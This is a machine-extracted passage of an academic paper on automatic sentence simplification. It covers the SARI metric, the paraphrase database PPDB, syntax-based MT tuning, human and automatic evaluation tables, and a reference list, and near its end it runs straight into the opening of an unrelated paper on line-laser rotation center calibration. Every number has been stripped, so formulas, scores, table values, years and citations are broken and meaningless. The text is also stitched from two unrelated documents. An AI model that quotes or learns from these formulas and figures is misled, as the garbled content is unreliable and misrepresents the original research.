is a binary indicator of occurrence of n- grams g in a given set (and is a fractional indicator in some later formulas) and #g(o ∩ i) = max(#g(o)−#g(i), ) #g(r ∩ i) = max(#g(r)−#g(i), ) therefore, in the example below, the addition of un- igram now is rewarded in both padd(n) and radd(n), while the addition of you in output- is penalized in padd(n): input: about species are currently accepted . ref- : about species are currently known . ref- : about species are now accepted . ref- : species are now accepted . output- : about you now get in . output- : about species are now agreed . output- : about species are currently agreed. the corresponding sari scores of these three toy outputs are . , . , . , which match with intuitions about their quality. to put it in perspective, the bleu scores are . , . , . respectively. bleu fails to distinguish be- tween output- and output- because match- ing any one of references is credited the same. not all the references are necessarily complete simpli- fications, e.g. ref- doesn’t simplify the word in the rare case when the denominator is in calculating precision p or recall r, we simply set the value of p and r to . input system outputhuman references input that is unchanged by system and which is not in the reference input that is retained in the references, but was deleted by the system overlap between all input that was correctly deleted by the system, and replaced by content from the references potentially incorrect system output figure : metrics that evaluate the output of monolingual text-to-text generation systems can compare system out- put against references and against the input sentence, un- like in mt metrics which do not compare against the (for- eign) input sentence. the different regions of this venn diagram are treated differently with our sari metric. currently, which gives bleu too much latitude for matching the input. words that are retained in both the system out- put and references should be rewarded. when mul- tiple references are used, the number of references in which an n-gram was retained matters. it takes into account that some words/phrases are considered simple and are unnecessary (but still encouraged) to be simplified. we use r′ to mark the n-gram counts over r with fractions, e.g. if a unigram (word about in above example) occurs in out of the total r ref- erences, then its count is weighted by /r in compu- tation of precision and recall: pkeep(n) = ∑ g∈i min ( #g(i ∩o), #g(i ∩r′) ) ∑ g∈i #g(i ∩o) rkeep(n) = ∑ g∈i min ( #g(i ∩o), #g(i ∩r′) ) ∑ g∈i #g(i ∩r′) ( ) where #g(i ∩o) = min ( #g(i), #g(o) ) #g(i ∩r′) = min ( #g(i), #g(r)/r ) for deletion, we only use precision because over- deleting hurts readability much more significantly than not deleting: pdel(n) = ∑ g∈i min ( #g(i∩o),#g(i∩r′) ) ∑ g∈i #g(i∩o) ( ) where #g(i ∩o) = max ( #g(i)−#g(o), ) #g(i ∩r′) = max ( #g(i)−#g(r)/r, ) [rb] solely → only lexical [nn] objective → goal [jj] undue → unnecessary [vp] accomplished → carried out phrasal [vp/pp] make a significant contribution → contribute greatly [vp/s] is generally acknowledged that → is widely accepted that [np/vp] the manner in which nn → the way nn syntactic [np] nnp ’s population → the people of nnp [np] nnp ’s jj legislation → the jj law of nnp table : example paraphrase rules in the paraphrase database (ppdb) that result in simplifications of the input. the rules are synchronous context-free grammar (scfg) rules where uppercase indicates non-terminal symbols. non- terminals can be complex symbols like vp/s which indicates that the rule forms a verb phrase (vp) missing a sentence (s) to its right. the final syntactic rule both simplifies and reorders the input phrase. the precision of what is kept also reflects the suf- ficiency of deletions. the n-gram counts are also weighted in r′ to compensate n-grams, such as the word currently in the example, that are not consid- ered as required simplification by human editors. together, in sari, we use arithmetic average of n-gram precisions poperation and recalls roperation: sari = d fadd + d fkeep + d pdel ( ) where d = d = d = / and poperation = k ∑ n=[ ,...,k] poperation(n) roperation = k ∑ n=[ ,...,k] roperation(n) foperation = ×poperation ×roperation poperation + roperation operation ∈ [del,keep,add] where k is the highest n-gram order and set to in our experiments. . incorporating large-scale paraphrase rules another challenge for text simplification is generat- ing an ample set of rewrite rules that potentially sim- plify an input sentence. most early work has relied on either hand-crafted rules (chandrasekar et al., ; carroll et al., ; siddharthan, ; vick- rey and koller, ) or dictionaries like wordnet (devlin et al., ; kaji et al., ; inui et al., ). other more recent studies have relied on the parallel normal-simple wikipedia corpus to au- tomatically extract rewrite rules (zhu et al., ; woodsend and lapata, ; coster and kauchak, b; wubben et al., ; narayan and gar- dent, ; siddharthan and angrosh, ; an- grosh et al., ). this technique does manage to learn a small number of transformations that sim- plify. however, we argue that because the size of the normal-simple wikipedia parallel corpus is quite small ( k sentence pairs with million words), the diversity and coverage of patterns that can be learned is actually quite limited. in this paper we will leverage the large-scale para- phrase database (ppdb) (ganitkevitch et al., ; pavlick et al., ) as a rich source of lexical, phrasal and syntactic simplification operations. it is created by extracting english paraphrases from bilingual parallel corpora using a technique called “bilingual pivoting” (bannard and callison-burch, ). the ppdb is represented as a synchronous context-free grammar (scfg), which is commonly used as the formalism for syntax-based machine translation (zollmann and venugopal, ; chiang, ; weese et al., ). table shows some ex- ample paraphrase rules in the ppdb. ppdb employs times more data ( mil- lion sentence pairs with billion words) than the normal-simple wikipedia parallel corpus. the en- glish portion of ppdb contains over million paraphrase rules, consisting of million lexical, million phrasal and million syntactic para- http://paraphrase.org phrase patterns. the key differences between the paraphrase rules from ppdb and the transforma- tions learned by the naive application of smt to the normal-simple wikipedia parallel corpus, are that the ppdb paraphrases are much more diverse. for example, ppdb contains paraphrases for ancient including antique, ancestral, old, age-old, archeological, former, antiquated, longstanding, ar- chaic, centuries-old, and so on. however, there is nothing inherent in the rule extraction process to say which of the ppdb paraphrases are simplifications. in this paper, we model the task by incorporating rich features into each rule and let smt advances in decoding and optimization determine how well a rule simplifies an input phrase. an alternative way of using ppdb for simplification would be to sim- ply discard any of its rules which did not result in a simplified output, possibly using a simple super- vised classifier (pavlick and callison-burch, ). . simplification-specific features for paraphrase rules designing good features is an essential aspect of modeling. for each input sentence i and its candi- date output sentence j, a vector of feature functions ~ϕ = {ϕ ...ϕn} are combined with a weight vector ~w in a linear model to obtain a single score h~w: h~w(i,j) = ~w · ~ϕ(i,j) ( ) in smt, typical feature functions are phrase trans- lation probabilities, word-for-word lexical transla- tion probabilities, a rule application penalty (which governs whether the system prefers fewer longer phrases or a greater number of shorter phrases), and a language model probability. together these fea- tures are what the model uses to distinguish between good and bad translations. for monolingual transla- tion tasks, previous research suggests that features like paraphrase probability and distributional sim- ilarity are potentially helpful in picking out good paraphrases (chan et al., ) and for text-to-text generation (ganitkevitch et al., b). while these two features quantify how good a paraphrase rule is in general, they do not indicate how good the rule is for a specific task, like simplification. for each paraphrase rule, we use all the fea- tures that were distributed with ppdb . and add new features for simplification purposes: length in characters, length in words, number of syllables, language model scores, and fraction of common en- glish words in each rule. these features are com- puted for both sides of a paraphrase pattern, the word with the maximum number of syllables on each side and the difference between the two sides, when it is applicable. we use language models built from the gigaword corpus and the simple wikipedia corpus collected by kauchak ( ). we also use a list of most common us english words compiled by paul and bernice noll. . creating multiple references like with machine translation, where there are many equally good translations, in simplification there may be several ways of simplifying a sentence. most previous work on text simplification only uses a sin- gle reference simplification, often from the simple wikipedia. this is undesirable since the simple wikipedia contains a large proportion of inadequate or inaccurate simplifications (xu et al., ) . in this study, we collect multiple human reference simplifications that focus on simplification by para- phrasing rather than deletion or splitting. we first selected the simple-normal sentence pairs of simi- lar length (≤ % differences in number of tokens) from the parallel wikipedia simplification (pwkp) corpus (zhu et al., ) that are more likely to be paraphrase-only simplifications. we then asked workers on amazon mechanical turk to rewrite a selected sentence from normal wikipedia (a subset of pwkp) into a simpler version while preserving its meaning, without losing any information or split- ting sentence. we removed bad workers by man- ual inspection on the worker’s first several submis- sions on the basis of a recent study (gao et al., ) on crowdsourcing translation that suggests turkers’ performance stays consistent over time and can be reliably predicted by their first few translations. in total, we collected reference simplifications for sentences, and randomly split them into sentences for tuning, for evaluation. many crowdsourcing workers were able to provide simpli- fications of good quality and diversity (see table we release the data with details for each feature. http://www.manythings.org/vocabulary/ lists/l/noll-about.php for an example and table for the manual quality evaluation). having multiple references allows us to develop automatic metrics similar to bleu to take advantage of the variation across many people’s sim- plifications. we leave more in-depth investigations on crowdsourcing simplification (pellow and eske- nazi, a,b) for future work. . tuning parameters like in statistical machine translation, we set the weights of the linear model ~w in the equation ( ) so that the system’s output is optimized with re- spect to the automatic evaluation metric on the sentence development set. we use the pairwise ranking optimization (pro) algorithm (hopkins and may, ) implemented in the open-source joshua toolkit (ganitkevitch et al., a; post et al., ) for tuning. specifically, we train the system to distinguish a good candidate output j from a bad candidate j′, measured by an objective function o (section . ), for an input sentence i: o(i,j) >o(i,j′) ⇐⇒ h~w(i,j) > h~w(i,j′) ⇐⇒ h~w(i,j)−h~w(i,j′) > ⇐⇒ ~w · ~ϕ(i,j)− ~w · ~ϕ(i,j′) > ⇐⇒ ~w · (~ϕ(i,j)− ~ϕ(i,j′)) > ( ) thus, the optimization reduces to a binary classifi- cation problem. each training instance is the dif- ference vector ~ϕ(i,j) − ~ϕ(i,j′)) of a pair of can- didates, and its training label is positive or negative depending on whether the value of o(i,j) −o(i,j′) is positive or negative. the candidates are generated according to h~w at each iteration, and sampled for making the training tractable. we use different met- rics: bleu, fkbleu and sari as objectives. experiments and analyses we implemented all the proposed adaptations into the open source syntactic machine translation de- coder joshua (post et al., ), and conducted the experiments with ppdb and the dataset of sentences collected in section . . most recent http://joshua-decoder.org/ we augment its lat- est version to include the text-to-text generation functionality described in this paper. paraphrase rule trans. model score principal → key . principal → main . principal → major . principal → chief . principal → core . principal → principal . principal → top . principal → senior . principal → lead . principal → primary . principal → prime . principal → keynote - . able-bodied → valid . able-bodied → sound . able-bodied → healthy . able-bodied → able-bodied . able-bodied → job-ready . able-bodied → employable - . able-bodied → non-disabled - . table : qualitative analysis of candidate paraphrases ranked by the translation model in sbmt (ppdb + sari), showing that the model is optimized towards sim- plicity in addition to the correctness of paraphrases. the final simplifications (in bold) are chosen in conjunction with the language model to fit the context and further bias towards more common n-grams. end-to-end sentence simplification systems use a basic phrase-based mt model trained on parallel wikipedia data using the moses decoder (štajner et al., , and others). one of the best systems is pbmt-r by wubben et al. ( ), which reranks moses’ n-best outputs based on their dissimilarity to the input to promote simplification. we also build a baseline by using bleu as the tuning metric in our adapted mt framework. we conduct both human and automatic evaluation to demonstrate the advan- tage of the proposed simplification systems. we also show the effectiveness of the two new metrics in tun- ing and automatic evaluation. . qualitative analysis table shows a representative example of the sim- plification results. the pbmt-r model failed to learn any good substitutions for the word able- bodied or the phrase are required to from the man- ually simplified corpora of limited size. in contrast, our proposed method can make use of more para- sentence normal wikipedia jeddah is the principal gateway to mecca, islam’s holiest city, which able-bodied muslims are required to visit at least once in their lifetime. simple wikipedia jeddah is the main gateway to mecca, the holiest city of islam, where able-bodied muslims must go to at least once in a lifetime. mechanical turk # jeddah is the main entrance to mecca, the holiest city in islam, which all healthy muslims need to visit at least once in their life. mechanical turk # jeddah is the main entrance to mecca, islam’s holiest city, which pure muslims are re- quired to visit at least once in their lifetime. pbmt-r (wubben et al., ) jeddah is the main gateway to mecca, islam’s holiest city, which able-bodied muslims are required of muslims at least once in their lifetime. sbmt (ppdb + bleu) jeddah is the main door to mecca, islam’s holiest city, which sound muslims are to go to at least once in their life. sbmt (ppdb + fkbleu) jeddah is the main gateway to mecca, islam’s holiest city, which sound muslims must visit at least once in their life. sbmt (ppdb + sari) jeddah is the main gateway to mecca, islam’s holiest city, which sound muslims have to visit at least once in their life. table : example human reference simplifications and automatic simplification system outputs. the bold font high- lights the parts of the sentence that are different from the original version in the normal wikipedia, and strikethrough denotes deletions. phrases learned from the more abundant bilingual texts. it improves method applicability to languages other than english, for which no simpler version of wikipedia is available. our proposed approach also provides an intu- itive way to inspect the ranking of candidate para- phrases in the translation model. this is done by scoring each rule in ppdb by equation using the weights optimized in the tuning process, as in ta- ble . it shows that our proposed method is capable of capturing the notion of simplicity using a small amount of parallel tuning data. it correctly ranks key and main as good simplifications for principal. its choices are not always perfect as it prefers sound over healthy for able-bodied. the final simplifi- cation outputs are generated according to both the translation model and the language model trained on the gigaword corpus to take into account context and further bias towards more common n-grams. . quantitative evaluation of simplification systems for the human evaluation, participants were shown the original english wikipedia sentence as a ref- erence and asked to judge a set of simplifications that were displayed in random order. they eval- uated a simplification from each system, the sim- ple wikipedia version, and a turker simplification. judges rated each simplification on two -point scales of meaning retention and grammaticality ( is the worst and is the best). we also ask partici- pants to rate simplicity gain (simplicity+) by count- ing how many successful lexical or syntactic para- phrases occurred in the simplification. we found this makes the judgment easier and that it is more infor- mative than rating the simplicity directly on -point scale, since the original sentences have very differ- ent readability levels to start with. more importantly, using simplicity gain avoids over-punishment of er- rors, which are already penalized for poor meaning retention and grammaticality, and thus reduces the bias towards very conservative models. we collect judgments on these three criteria from five different annotators and report the average scores. table shows that our best system, a syntactic- based mt system (sbmt) using ppdb as the source of paraphrase rules and tuning towards the sari metric, achieves better performance in all three simplification measurements than the state-of- the-art system pbmt-r. the relatively small val- ues of simplicity gain, even for the two human ref- erences (simple wikipedia and mechanical turk), clearly show the major challenge of simplification, which is the need of not only generating paraphrases but also ensuring the generated paraphrases are sim- pler while fitting the contexts. although many re- searchers have noticed this difficulty, pbmt-r is one of the few that tried to address it by promoting grammar meaning simplicity+ #tokens #chars edit dist. normal wikipedia . . . . simple wikipedia . . . . mechanical turk . . . . pbmt-r (wubben et al., ) . . . . sbmt (ppdb + bleu) . . . . sbmt (ppdb + fkbleu) . . . . sbmt (ppdb + sari) . . . . table : human evaluation (grammar, meaning, simplicity+) and basic statistics of our proposed systems (sbmts) and baselines. pbmt-r is an reimplementation of the state-of-the-art system by wubben et al. ( ). newly proposed metrics fkbleu and sari show advantages for tuning. fk bleu ibleu fkbleu sari normal wikipedia . . . . . simple wikipedia . . . . . mechanical turk . . . . . pbmt-r (wubben et al., ) . . . . . sbmt (ppdb + bleu) . . . . . sbmt (ppdb + fkbleu) . . . . . sbmt (ppdb + sari) . . . . . table : automatic evaluation of different simplification systems. most systems achieve similar fk readability scores as human. the sari metric ranks all different systems and human references in the same order as human assess- ment. tuning towards bleu with all references results in identical transformation (same as normal wikipedia), as this can get a near-perfect bleu score of . (out of ). outputs that are dissimilar to the input. our best sys- tem is able to make more effective paraphrases (bet- ter simplicity+) while introducing less errors (better grammar and meaning). table shows the automatic evaluation. an en- couraging fact is that sari metric ranks all dif- ferent systems and human references in the same order as human assessment. most systems achieve similar fk readability as human editors, using fewer words or words with fewer syllables. tuning to- wards bleu with all references results in no trans- formation (same as input), as this can get a near- perfect bleu score of . (out of ). table shows the computation time for different metrics. sari is only slightly slower than bleu but achieves much better simplification quality. time (milliseconds) bleu . fkbleu . sari . table : average computation time of different metrics per candidate sentence. . correlation of automatic metrics with human judgments table shows the correlation of automatic metrics with human judgment. there are several interesting observations. first, simplicity is essential in measuring the goodness of simplification. however, none of the existing metrics (i.e. fk, bleu, ibleu) demon- strate any significant correlation with the simplicity scores rated by humans, same as noted in previous work (wubben et al., ; štajner et al., ). in contrast, our two new metrics, fkbleu and sari, achieve a much better correlation with humans in simplicity judgment while still capturing the notion of grammaticality and meaning preservation. this explains why they are more suitable than bleu to be used in training the simplification models. in particular, sari provides a balanced and integrative measurement of system performance that can assist iterative development. to date, developing advanced simplification systems has been a difficult and time- consuming process, since it is impractical to run new spearman’s ρ ref. grammar meaning simplicity+ fk none - . (≈ . ) . (<. ) . (<. ) bleu single . (<. ) . (<. ) . (<. ) bleu multiple . (<. ) . (<. ) . (<. ) ibleu single . (<. ) . (<. ) . (<. ) ibleu multiple . (<. ) . (<. ) . (<. ) fkbleu multiple . (<. ) . (<. ) . (<. ) sari multiple . (<. ) . (<. ) . (<. ) table : correlations (and two-tailed p-values) of metrics against the human ratings at sentence-level (also see figure ). in this work, we propose to use multiple (eight) references and two new metrics: fkbleu and sari. for all three criteria of simplification quality, sari correlates reasonably with human judgments. in contrast, previous works use only a single reference. existing metrics bleu and ibleu show higher correlations on grammaticality and meaning preservation using multiple references, but fail to measure the most important aspect of simplification – simplicity. human evaluation every time a new model is built or parameters are adjusted. second, the correlation of automatic metrics with human judgment of grammaticality and meaning preservation is higher than any reported before (wubben et al., ; štajner et al., ). it val- idates our argument that constraining simplification to only paraphrasing reduces the complication from deletion and splitting, and thus makes automatic evaluation more feasible. using multiple references further improves the correlations. . why does bleu correlate strongly with meaning/grammar, and sari with simplicity? here we look more deeply at the correlations of bleu and sari with human judgments. our sari metric has highest correlation with human judg- ments of simplicity, but bleu exhibits higher corre- lations on grammaticality and meaning preservation. bleu was designed to evaluate bilingual transla- tion systems. it measures the n-gram precision of a system’s output against one or more references. bleu ignores recall (and compensates for this with its brevity penalty). bleu prefers an output that is not too short and contains only n-grams that appear in any reference. the role of multiple references in bleu is to capture allowable variations in trans- lation quality. when applied to monolingual tasks like simplification, bleu does not take into account anything about the differences between the input and the references. in contrast, sari takes into account both precision and recall, by looking at the differ- ence between the references and the input sentence. figure : a scatter plot of bleu scores vs. sari scores for the individual sentences in our test set. the metrics’ scores for many sentences substantially diverge. few of the sentences that scored perfectly in bleu receive a high score from sari. in this work, we use multiple references to capture many different ways of simplifying the input. unlike bilingual translation, the more references created for the monolingual simplification task the more n-grams of the original input will be included in the references. that means, with more references, outputs that are close or identical to the input will get high bleu. outputs with few changes also receive high grammar/meaning scores from human judges; but these do not necessarily get high sari score nor are they good simplifications. bleu therefore tends to favor conservative systems that do not make many changes, while sari penalizes them. this can be . . . . . . . h um an s co re sari vs. grammar . . . . . . . sari vs. meaning . . . . . . . sari vs. simplicity . . . . . . . automatic score h um an s co re bleu vs. grammar . . . . . . . automatic score bleu vs. meaning . . . . . . . automatic score h um an r at in g bleu vs. simplicity figure : scatter plots of automatic metrics against human scores for individual sentences. seen in figure where sentences with a bleu score of . receive a range of scores from sari. the scatter plots in figure further illustrate the above analysis. these plots emphasize the correla- tion of high human scores on meaning/grammar for systems that make few changes (which bleu re- wards, but sari does not). the tradeoff is that con- servative outputs with few or no changes do not re- sult in increased simplicity. sari correctly rewards systems that make changes that simplify the input. conclusions and future work in this paper, we presented an effective adaptation of statistical machine translation techniques. we find the approach promising in suggesting two new directions: designing tunable metrics that corre- late with human judgements and using simplicity- enriched paraphrase rules derived from larger data than the normal-simple wikipedia dataset. for fu- ture work, we think it might be possible to design a universal metric that works for multiple text-to- text generation tasks (including sentence simplifica- tion, compression and error correction), at the same time using the same idea of comparing system out- put against multiple references and against the input. the metric could possibly include tunable parame- ters or weighted human judgments on references to accommodate different tasks. finally, we are also interested in designing neural translation models for the simplification task. acknowledgments the authors would like to thank juri ganitkevitch, jonny weese, kristina toutanova, matt post, and shashi narayan for valuable discussions. we also thank action editor stefan riezler and three anony- mous reviewers for their thoughtful comments. this material is based on research sponsored by the nsf under grant iis- and the nsf grfp under grant . the views and conclusions con- tained in this publication are those of the authors and should not be interpreted as representing offi- cial policies or endorsements of the nsf or the u.s. government. this research is also supported by the alfred p. sloan foundation, and by facebook via a student fellowship and a faculty research award. references allen, d. ( ). a study of the role of relative clauses in the simplification of news texts for learners of english. system, ( ): – . amancio, m. a. and specia, l. ( ). an analysis of crowdsourced text simplifications. in proceed- ings of the rd workshop on predicting and im- proving text readability for target reader popu- lations (pitr). angrosh, m., nomoto, t., and siddharthan, a. ( ). lexico-syntactic text simplification and compression with typed dependencies. in pro- ceedings of the th conference of the euro- pean chapter of the association for computa- tional linguistics (eacl). bannard, c. and callison-burch, c. ( ). para- phrasing with bilingual parallel corpora. in pro- ceedings of the rd annual meeting of the asso- ciation for computational linguistics (acl). biran, o., brody, s., and elhadad, n. ( ). putting it simply: a context-aware approach to lexical simplification. in proceedings of the th annual meeting of the association for computa- tional linguistics: human language technolo- gies (acl-hlt). carroll, j., minnen, g., pearce, d., canning, y., de- vlin, s., and tait, j. ( ). simplifying text for language-impaired readers. in proceedings of the th conference of the th european conference for computational linguistics (eacl). chan, t. p., callison-burch, c., and van durme, b. ( ). reranking bilingually extracted para- phrases using monolingual distributional similar- ity. in proceedings of the workshop on geo- metrical models of natural language semantics (mttg). chandrasekar, r., doran, c., and srinivas, b. ( ). motivations and methods for text simpli- fication. in proceedings of the th conference on computational linguistics (coling). chen, b., kuhn, r., and larkin, s. ( a). port: a precision-order-recall mt evaluation metric for tuning. in proceedings of the th annual meet- ing of the association for computational linguis- tics (acl). chen, d. l. and dolan, w. b. ( ). collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). chen, h.-b., huang, h.-h., chen, h.-h., and tan, c.-t. ( b). a simplification-translation- restoration framework for cross-domain smt ap- plications. in proceedings of the th interna- tional conference on computational linguistics (coling). chiang, d. ( ). hierarchical phrase-based trans- lation. computational linguistics, ( ): – . clarke, j. and lapata, m. ( ). models for sentence compression: a comparison across do- mains, training requirements and evaluation mea- sures. in proceedings of the st international conference on computational linguistics and th annual meeting of the association for com- putational linguistics (acl-coling). coster, w. and kauchak, d. ( a). learning to simplify sentences using wikipedia. in proceed- ings of the workshop on monolingual text-to-text generation. coster, w. and kauchak, d. ( b). simple en- glish wikipedia: a new text simplification task. in proceedings of the th annual meeting of the association for computational linguistics: hu- man language technologies (acl-hlt). dahlmeier, d. and ng, h. t. ( ). better eval- uation for grammatical error correction. in pro- ceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technolo- gies (naacl-hlt). de belder, j. and moens, m.-f. ( ). text simpli- fication for children. in proceedings of the sigir workshop on accessible search systems. devlin, s., tail, j., canning, y., carroll, j., min- nen, g., and pearce, d. ( ). the application of assistive technology in facilitating the compre- hension of newspaper text by aphasic people. as- sistive technology on the threshold of the new millennium, page . evans, r., orasan, c., and dornescu, i. ( ). an evaluation of syntactic simplification rules for people with autism. in proceedings of the rd workshop on predicting and improving text readability for target reader populations (pitr). felice, m. and briscoe, t. ( ). towards a stan- dard evaluation method for grammatical error de- tection and correction. in proceedings of the conference of the north american chapter of the association for computational linguistics (naacl). feng, l. ( ). text simplification: a survey. the city university of new york, technical report. filippova, k., alfonseca, e., colmenares, c. a., kaiser, l., and vinyals, o. ( ). sentence com- pression by deletion with lstms. in proceedings of the conference on empirical methods in natural language processing (emnlp). filippova, k. and strube, m. ( ). dependency tree based sentence compression. in proceedings of the fifth international natural language gen- eration conference (inlg). galley, m., brockett, c., sordoni, a., ji, y., auli, m., quirk, c., mitchell, m., gao, j., and dolan, b. ( ). deltableu: a discriminative metric for generation tasks with intrinsically diverse tar- gets. in proceedings of the rd annual meeting of the association for computational linguistics (acl). ganitkevitch, j., cao, y., weese, j., post, m., and callison-burch, c. ( a). joshua . : packing, pro, and paraphrases. in proceedings of the sev- enth workshop on statistical machine translation (wmt). ganitkevitch, j., van durme, b., and callison- burch, c. ( b). monolingual distributional similarity for text-to-text generation. in proceed- ings of the first joint conference on lexical and computational semantics (*sem). ganitkevitch, j., van durme, b., and callison- burch, c. ( ). ppdb: the paraphrase database. in proceedings of the conference of the north american chapter of the association for computational linguistics (naacl). gao, m., xu, w., and callison-burch, c. ( ). cost optimization in crowdsourcing translation. in proceedings of the conference of the north american chapter of the association for computational linguistics (naacl). hopkins, m. and may, j. ( ). tuning as rank- ing. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). horn, c., manduca, c., and kauchak, d. ( ). learning a lexical simplifier using wikipedia. in proceedings of the th annual meeting of the as- sociatioin for computational linguistics (acl). hwang, w., hajishirzi, h., ostendorf, m., and wu, w. ( ). aligning sentences from standard wikipedia to simple wikipedia. in proceed- ings of the conference of the north ameri- can chapter of the association for computational linguistics (naacl). inui, k., fujita, a., takahashi, t., iida, r., and iwakura, t. ( ). text simplification for read- ing assistance: a project note. in proceedings of the nd international workshop on paraphrasing (iwp). kaji, n., kawahara, d., kurohash, s., and sato, s. ( ). verb paraphrase based on case frame alignment. in proceedings of the th annual meeting on association for computational lin- guistics (acl). kauchak, d. ( ). improving text simplification language modeling using unsimplified text data. in proceedings of the conference of the as- sociation for computational linguistics (acl). kincaid, j. p., fishburne jr, r. p., rogers, r. l., and chissom, b. s. ( ). derivation of new read- ability formulas (automated readability index, fog count and flesch reading ease formula) for navy enlisted personnel. technical report, defence technical information center (dtic) document. knight, k. and marcu, d. ( ). summarization beyond sentence extraction: a probabilistic ap- proach to sentence compression. artificial intelli- gence. liu, c., dahlmeier, d., and ng, h. t. ( ). tesla: translation evaluation of sentences with linear-programming-based analysis. in proceed- ings of the joint fifth workshop on statistical ma- chine translation and metrics (matr). miwa, m., saetre, r., miyao, y., and tsujii, j. ( ). entity-focused sentence simplification for relation extraction. in proceedings of the rd international conference on computational lin- guistics (coling). napoles, c., sakaguchi, k., post, m., and tetreault, j. ( ). ground truth for grammatical error correction metrics. in proceedings of the rd annual meeting of the association for computa- tional linguistics (acl). narayan, s. and gardent, c. ( ). hybrid simpli- fication using deep semantics and machine trans- lation. in proceedings of the nd annual meet- ing of the association for computational linguis- tics (acl). och, f. j. ( ). minimum error rate training in statistical machine translation. in proceedings of the st annual meeting on association for com- putational linguistics (acl). pavlick, e., bos, j., nissim, m., beller, c., durme, b. v., and callison-burch, c. ( ). adding se- mantics to data-driven paraphrasing. in proceed- ings of the rd annual meeting of the associa- tion for computational linguistics (acl). pavlick, e. and callison-burch, c. ( ). simple ppdb: a paraphrase database for simplification. in the th annual meeting of the association for computational linguistics (acl). pellow, d. and eskenazi, m. ( a). an open corpus of everyday documents for simplification tasks. in proceedings of the rd workshop on pre- dicting and improving text readability for target reader populations (pitr). pellow, d. and eskenazi, m. ( b). tracking hu- man process using crowd collaboration to enrich data. in proceedings of second aaai confer- ence on human computation and crowdsourcing (hcomp). petersen, s. e. and ostendorf, m. ( ). text sim- plification for language learners: a corpus anal- ysis. in proceedings of workshop on speech and language technology for (slate). post, m., ganitkevitch, j., orland, l., weese, j., cao, y., and callison-burch, c. ( ). joshua . : sparser, better, faster, server. in proceed- ings of the eighth workshop on statistical ma- chine translation (wmt). rello, l., baeza-yates, r. a., and saggion, h. ( ). the impact of lexical simplification by verbal paraphrases for people with and without dyslexia. in proceedings of the th interna- tional conference on intelligent text processing and computational linguistics (cicling). rush, a. m., chopra, s., and weston, j. ( ). a neural attention model for abstractive sentence summarization. in proceedings of the con- ference on empirical methods in natural lan- guage processing (emnlp). siddharthan, a. ( ). syntactic simplification and text cohesion. research on language and com- putation, ( ): – . siddharthan, a. ( ). a survey of research on text simplification. special issue of international journal of applied linguistics, ( ). siddharthan, a. and angrosh, m. ( ). hybrid text simplification using synchronous dependency grammars with hand-written and automatically harvested rules. in proceedings of the th inter- national conference on computational linguis- tics (coling). siddharthan, a. and katsos, n. ( ). reformulat- ing discourse connectives for non-expert readers. in proceedings of the annual conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt). siddharthan, a., nenkova, a., and mckeown, k. ( ). syntactic simplification for improving content selection in multi-document summariza- tion. in proceedings of the th international conference on computational linguistics (col- ing). specia, l., jauhar, s. k., and mihalcea, r. ( ). semeval- task : english lexical simplifica- tion. in proceedings of the sixth international workshop on semantic evaluation (semeval). štajner, s., béchara, h., and saggion, h. ( ). a deeper exploration of the standard pb-smt ap- proach to text simplification and its evaluation. in proceedings of the rd annual meeting of the association for computational linguistics (acl). štajner, s., mitkov, r., and saggion, h. ( ). one step closer to automatic evaluation of text simpli- fication systems. in proceedings of the rd work- shop on predicting and improving text readabil- ity for target reader populations (pitr). sun, h. and zhou, m. ( ). joint learning of a dual smt system for paraphrase generation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). vickrey, d. and koller, d. ( ). sentence sim- plication for semantic role labeling. in proceed- ings of the th annual meeting of the associa- tion for computational linguistics: human lan- guage technologies (acl-hlt). watanabe, w. m., junior, a. c., uzêda, v. r., fortes, r. p. d. m., pardo, t. a. s., and aluı́sio, s. m. ( ). facilita: reading assistance for low-literacy readers. in proceedings of the th acm international conference on design of communication (sigdoc). weese, j., ganitkevitch, j., callison-burch, c., post, m., and lopez, a. ( ). joshua . : syntax- based machine translation with the thrax grammar extractor. in proceedings of the sixth workshop on statistical machine translation (wmt). woodsend, k. and lapata, m. ( ). learning to simplify sentences with quasi-synchronous gram- mar and integer programming. in proceedings of the conference on empirical methods in natural language processing (emnlp). wubben, s., van den bosch, a., and krahmer, e. ( ). sentence simplification by monolingual machine translation. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). xu, w., callison-burch, c., and napoles, c. ( ). problems in current text simplification research: new data can help. transactions of the as- sociation for computational linguistics (tacl), : – . xu, w., ritter, a., dolan, b., grishman, r., and cherry, c. ( ). paraphrasing for style. in pro- ceedings of the th international conference on computational linguistics (coling). yatskar, m., pang, b., danescu-niculescu-mizil, c., and lee, l. ( ). for the sake of simplicity: unsupervised extraction of lexical simplifications from wikipedia. in proceedings of the an- nual conference of the north american chapter of the association for computational linguistics: human language technologies (acl-hlt). zhu, z., bernhard, d., and gurevych, i. ( ). a monolingual tree-based translation model for sen- tence simplification. in proceedings of the rd international conference on computational lin- guistics (coling). zollmann, a. and venugopal, a. ( ). syntax augmented machine translation via chart parsing. in proceedings of the workshop on statistical ma- chine translation (wmt). paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , rotation center calibration based on line laser rotating platform lei doudou school of computer science and engineering xi’an technological university xi’an, , china e-mail: ccdd @qq.com liu baolong school of computer science and engineering xi’an technological university xi’an, china e-mail: liu.bao.long@hotmail.com yao huimin eighth of production plant, the company china petrdeum, changqing oilfield, xi’an xi’an, , china abstract—line lasers are of great significance in many fields such as industrial inspection, machine vision, cultural relics identification, mechanical design, and medical oral cavity. the three-dimensional reconstruction of the line laser can accurately obtain the three-dimensional information of the surface of the object, and quickly complete the three-dimensional contour reconstruction of the object to be tested. in the online laser rotation scanning, the object rotates around a certain point, which is a rotation center, and the calibration of the rotation center is the main factor that restricts the accuracy of the three-dimensional contour. at present, the calibration of the center of rotation is mainly obtained by the characteristics of a circle (ball, cylinder, cone, etc.). this paper mainly introduces the basic process of rotating scanning, rotating center, and rotating methods as well as their advantages and disadvantages. first, the basic process of rotating scanning is briefly introduced. secondly, the definition and content of the rotating center are introduced. then, the calibration methods of three rotating centers (ellipse fitting method, symmetry method, plane fitting method) are introduced. finally, the advantages and disadvantages of the three calibration methods and their respective applications are summarized. keywords-line laser; rotary scanning; rotation center; calibration i. introduction in today's life, two-dimensional information can no longer meet people's daily needs. the three- dimensional information has thus been deeply researched and developed. among them, the line laser is widely used in the three-dimensional reconstruction process. 